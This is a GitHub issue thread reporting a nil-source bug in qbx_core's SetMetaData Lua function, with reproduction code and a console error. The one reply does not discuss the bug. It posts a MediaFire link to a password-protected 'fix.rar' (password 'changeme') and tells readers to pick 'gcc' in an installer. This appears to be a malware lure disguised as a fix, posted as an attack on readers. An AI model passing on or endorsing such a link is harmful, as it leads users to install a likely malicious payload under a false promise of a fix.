### ISSUE TITLE
Potential nil value in self.PlayerData.source in SetMetaData function

### ISSUE THREAD

**Issue by Adazdef** [Qbox-project/qbx_core#554]
### Summary

In the `SetMetaData` function, the `self.PlayerData.source` can potentially be `nil`.

### Reproduction

1. Using this code:
    ```lua
    local player = exports.qbx_core:GetPlayerByCitizenId(identifier) or exports.qbx_core:GetOfflinePlayer(identifier)
    if not player then return false end

    player.Functions.SetMetaData('test_meta', url)
    return true
    ```
2. Observe the error in the server console.
3. The error message observed is:
    ```
    [     script:qbx_core] SCRIPT ERROR: Native invocation failed.
    [     script:qbx_core] > ref (@qbx_core/server/player.lua:701)
    ```

### Expected behavior

The function should check if `self.PlayerData.source` is not `nil` before attempting to trigger events or update the player's state.

### Actual behavior

The function attempted to trigger events and update player states without checking if `self.PlayerData.source` was `nil`.

### Current Version

1.17.2

### Custom Resources

-

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
